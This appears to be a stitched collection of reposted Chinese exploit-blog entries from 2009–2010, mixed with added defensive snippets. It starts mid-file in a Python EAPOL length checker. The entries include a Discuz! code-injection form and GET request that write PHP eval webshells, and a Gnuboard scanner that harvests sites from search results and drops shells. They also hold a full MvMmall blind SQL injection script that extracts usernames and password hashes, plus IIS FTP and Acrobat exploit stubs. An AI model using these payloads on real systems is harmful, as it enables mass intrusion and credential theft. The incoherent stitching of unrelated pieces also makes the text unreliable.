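    version, ptype, claimed = struct.unpack_from(">BBH", frame, eapol_off)
    present = len(frame) - eapol_off - 4                 # bytes actually following the header
    if claimed > present:
        return {"ok": False,
                "reason": "EAPOL length %d exceeds the %d bytes present" % (claimed, present)}
    if claimed > max_eapol_len:
        return {"ok": False,
                "reason": "EAPOL length %d exceeds the %d-byte buffer" % (claimed, max_eapol_len)}
    return {"ok": True, "version": version, "type": ptype, "eapol_len": claimed}


def build_frame(claimed_len: int, body: bytes) -> bytes:
    """Constructed to-DS data frame with LLC/SNAP and one EAPOL-Key packet (test input)."""
    mac_hdr = (bytes.fromhex("0801") + bytes(2)          # FC (data, to-DS), duration
               + bytes.fromhex("00deadc0de00")           # addr1
               + bytes.fromhex("00deadc0de01")           # addr2
               + bytes(6) + bytes(2))                    # addr3, sequence control
    llc_snap = bytes.fromhex("aaaa03" "000000" "888e")
    eapol_hdr = struct.pack(">BBH", 1, 3, claimed_len)   # version 1, type 3 (EAPOL-Key)
    return mac_hdr + llc_snap + eapol_hdr + body


# Constructed inputs. The first mirrors the page's packet: length 65000 with only a
# short WPA key descriptor and padding behind it.
OVERREAD_FRAME = build_frame(65000, b"\xfe" + bytes(94) + b"Can I has some moar?")
# Consistent length, but larger than the fixed 256-byte buffer.
OVERSIZE_FRAME = build_frame(300, bytes(300))
# A well-formed EAPOL-Key frame with a 95-byte descriptor body.
GOOD_FRAME = build_frame(95, b"\xfe" + bytes(94))

if __name__ == "__main__":
    for name, frame in [("overread", OVERREAD_FRAME), ("oversize", OVERSIZE_FRAME), ("good", GOOD_FRAME)]:
        print(name, check_eapol_frame(frame))
```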


Discuz! 7.1/7.2 remote code execution vulnerability exploit

January 7, 2010, no comments, 496 views

1. Register a new user.
2. The exploit code is as follows:

```html
<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).
chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).
chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).
chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).
chr(99).chr(104).chr(101).chr(47).chr(117).
chr(115).chr(101).chr(114).chr(103).chr(114).
chr(111).chr(117).chr(112).chr(95).chr(48).
chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).
chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).
chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).
chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).
chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).
chr(91).chr(99).chr(109).chr(100).chr(93).
chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
```

With the chr() chain decoded, the value reads:

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

Save this as an HTML file.

Open it and click submit; this creates the one-line webshell forumdata/cache/usergroup_01.php, with password cmd.

Second method:

Directly via GET, using the following request:

```
misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),
base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
```

This creates C.PHP in the web root, with password C.

Temporary fix:

Add the following at the top of common.inc.php:

```php
$response=$scriptlang=array();
```

Official patch released:

http://www.discuz.net/thread-1537673-1-1.html
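As an added defensive example (not from the original post), a log check for the GET form of this request: it flags misc.php?action=imme_binding requests whose scriptlang[...] parameter carries the ${...} syntax the post relies on, and marks POSTs to misc.php for body inspection, since the form variant's parameters travel in the multipart body and never reach an access log. The log lines are constructed, with the payload inside the braces replaced by a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the page). Line 3 mirrors the GET variant
# described above with its scriptlang[] value URL-encoded; the payload between the
# braces is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jan/2010:10:00:01 +0800] "GET /bbs/viewthread.php?tid=1 HTTP/1.1" 200 5120
192.0.2.11 - - [07/Jan/2010:10:00:02 +0800] "GET /bbs/misc.php?action=imme_binding&tid=1 HTTP/1.1" 200 311
192.0.2.12 - - [07/Jan/2010:10:00:03 +0800] "GET /bbs/misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]=%7B%24%7BPLACEHOLDER_PAYLOAD%7D%7D HTTP/1.1" 200 311
192.0.2.13 - - [07/Jan/2010:10:00:04 +0800] "POST /bbs/misc.php HTTP/1.1" 200 311
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d+)')


def parse_line(line: str):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_imme_binding_abuse(url: str) -> bool:
    """True for a misc.php?action=imme_binding request whose scriptlang[...] value
    carries PHP's ${ or {$ variable-variable syntax, the construct abused above."""
    parts = urlsplit(url)
    if not parts.path.endswith("/misc.php"):
        return False
    params = parse_qsl(parts.query, keep_blank_values=True)   # values are URL-decoded here
    if ("action", "imme_binding") not in params:
        return False
    return any(k.startswith("scriptlang[") and ("${" in v or "{$" in v) for k, v in params)


def scan_log(text: str) -> list:
    """Return (ip, verdict, url) for suspicious lines. POSTs to misc.php are only
    flagged for body inspection: the form variant sends its parameters in the
    multipart body, which never reaches the access log."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["url"]).path
        if rec["method"] == "GET" and is_imme_binding_abuse(rec["url"]):
            hits.append((rec["ip"], "imme_binding_code_injection", rec["url"]))
        elif rec["method"] == "POST" and path.endswith("/misc.php"):
            hits.append((rec["ip"], "misc_php_post_inspect_body", rec["url"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```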


Gnuboard 0day&Exp

2009年9月22日 没有评论 252 views

利用代码如下:

<?php
// Gnuboard g4_path scanner: harvests bbs/board.php URLs from Naver web search, then probes
// each site's common.php?g4_path= for null-byte path truncation and data: wrapper inclusion.
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;   // Naver result offset: 10 hits per page
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
// every http://host[:port]/.../bbs/board.php link in the result page
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i<count($put[0]);$i++)
{
$a=(int)$i*3;   // original indexing; with the break below only $put[0][0] is ever probed

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);   // strip bbs/board.php to get the site root URL

$file=$a."common.php?g4_path=/tmp%002345";   // null-byte probe: PHP < 5.3.4 reads this path as /tmp
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";   // data: wrapper: the base64 is a dropper that writes data/ok.php
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=(string)@file_get_contents($file);
// an include warning that mentions tmp means the request-supplied g4_path reached include() unchecked
if(preg_match('/Warning/i',$xx)&&preg_match('/tmp/i',$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);   // fire the dropper
$okshell=(string)@file_get_contents($shell);
if(!preg_match('/02345/i',$xx))   // was eregi("(\\02345)"): if the bytes after %00 are missing from the warning, the null byte truncated the path
{
print $sitepath." %00 ok"."\r\n";
}

if (preg_match('/fuckyou/i',$okshell))   // the dropper's marker string confirms the shell is live
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>
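What the two g4_path probes in the scanner depend on, and the check that defeats both, as an added PHP example. This is not Gnuboard code; the include shape and all function names are assumptions. The base64 in the data: URI decodes to `<?fputs(fopen('./data/ok.php','w+'),'<?php @eval($_POST[c]);echo "fuckyou";?>');?>`, which is why the scanner looks for "fuckyou" in data/ok.php afterwards.

```php
<?php
// Added example, not Gnuboard code: the mechanics behind the g4_path probes above and a
// path check that rejects both. Function names and the include shape are assumptions.

// Decodes a data: URI such as the one the scanner sends, so the dropper it carries can be
// read before it is ever sent to a host.
function decode_data_uri(string $uri): ?string
{
    if (!preg_match('#^data:([^,]*),(.*)$#s', $uri, $m)) {
        return null;
    }
    return stripos($m[1], ';base64') !== false
        ? (base64_decode($m[2], true) ?: null)
        : rawurldecode($m[2]);
}

// Vulnerable shape (assumed): the include base comes straight from the request. With
// register_globals, ?g4_path=... sets it; a data: URI then feeds attacker source to
// include (only when allow_url_include is on), and on PHP < 5.3.4 a %00 truncated the
// path, so g4_path=/tmp%002345 was opened as /tmp, which the scanner's "Warning"+"tmp"
// test detects.
function include_vulnerable(string $g4_path): void
{
    include $g4_path . '/lib/common.lib.php';
}

// Hardened: the base directory is fixed by configuration, and any request-supplied
// relative name must resolve to an existing path underneath it. Stream wrappers, null
// bytes and ../ escapes all fail this test.
function resolve_under_base(string $base, string $candidate): ?string
{
    if ($candidate === '' || strpos($candidate, "\0") !== false) {
        return null;                                         // null-byte truncation trick
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;                                         // data:, php://, http:// ...
    }
    $baseReal = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $candidate);
    if ($baseReal === false || $real === false) {
        return null;                                         // nothing there to include
    }
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Demo with the scanner's own payloads; nothing is sent anywhere.
$dropper = 'data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==';
echo decode_data_uri($dropper), "\n";                    // the dropper source, printed, not run
var_dump(resolve_under_base(__DIR__, "/tmp\x002345"));   // NULL: null byte
var_dump(resolve_under_base(__DIR__, $dropper));          // NULL: stream wrapper
var_dump(resolve_under_base(__DIR__, '../../etc'));      // NULL unless that really resolves under __DIR__
var_dump(resolve_under_base(__DIR__, basename(__FILE__))); // this script's own path: allowed
```

Two caveats when reading scanner output today: from PHP 5.3.4 the null byte no longer truncates include paths (PHP 8 throws a ValueError on it), and allow_url_include has defaulted to Off since PHP 5.2, so the data: probe only works where someone turned it on.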

Category: 资源共享

MvMmall_V5.5.1 Blind SQL Injection Exploit

September 21, 2009 | No comments | 81 views

The exploit code:

<?php
ini_set("max_execution_time",0);
error_reporting(7);

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix = "mvm_";   // default table prefix; replaced by the real one read from the error page below
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] MvMmall_V5.5.1 Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
"\n[+] Ex. : php ".$argv[0]." localhost /shop 1".
"\n\n";
exit ();
}

// One injected request to contrast.php?id=; returns the raw HTTP reply.
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

if (!$fp) {
echo 'No response from '.$hostname; die;
}

$request = "GET {$path}/contrast.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

$reply = '';
while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

// Boolean oracle: a true injected condition makes contrast.php emit a product link with a
// non-empty title attribute. Whatever followed \"> in the original pattern was lost in extraction.
function oracle ($reply)
{
preg_match ("/target=\"_blank\" title=\"(.+)\">/", $reply, $x);
return isset ($x [1]) && strlen (trim ($x [1])) != 0;
}

// Finds length(member_id) for the target uid by trying 0, 1, 2, ... until the oracle fires.
function lengthcolumns ($userid, $prefix)
{
global $path,$hostname;
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "-1) Or length((select member_id from ".$prefix."member_table Where uid={$userid}))=".$i."%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

$i++;

if ($i>30) {die(" Exploit failed...");}

if (oracle ($reply))
$exit=1;
}

$length=$i-1;

echo "[+]length -> ".$length;

return $length;
}

// True when character $pos of the selected field equals $chr.
function exploit ($hostname, $path, $userid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "-1) Or ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member_table WHERE uid={$userid}),{$pos},1))={$chr}%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

return oracle ($reply);
}

echo "\n-------------------------------------------------------------------------------\n\n";
echo " MvMmall_V5.5.1 Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n-------------------------------------------------------------------------------\n\n";
echo "[~]Trying to get pre...\n";

$query = "-1))%23";   // extra closing parenthesis: the MySQL error echoes the query, table prefix included

$reply = request ($hostname, $path, $query);

// the original used the /e modifier here, which is invalid for preg_match and makes it return false
preg_match('/FROM `(.+?)goods_table/i',$reply,$match);

$prefix=isset($match[1]) ? $match[1] : '';

if ($prefix!==''){echo "[+]Good Job!Wo Got The pre -> ".$prefix."\n";}else{die(" Exploit failed...");}

echo "[~]Trying to get username length...\n";

$length = lengthcolumns($userid, $prefix);

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos <= $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if ($chr >= strlen ($key)) {die("\n Exploit failed: character ".$pos." is outside the charset");}

if (exploit ($hostname, $path, $userid, "member_id", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;   // the author recovers only hex digits 9..24 of the 32-character md5

echo "\n[+]password(md5) -> ";

while ($pos <= 24)
{
$key = "abcdef0123456789";

if ($chr >= strlen ($key)) {die("\n Exploit failed: character ".$pos." is outside the charset");}

if (exploit ($hostname, $path, $userid, "member_pass", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n-------------------------------------------------------------------------------";
?>

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (Chinese/English universal version)

September 20, 2009 | No comments | 84 views

Opens a bind shell on port 4444. Tested on Windows 2000 CN + SP4. Requires an FTP user that is allowed to create directories. If the offset addresses are not universal for your target, adjust them yourself.

Category: 矩阵毒刺

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

September 4, 2009 | No comments | 124 views

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

Category: 矩阵毒刺

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

September 2, 2009 | No comments | 94 views

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
Category: 矩阵毒刺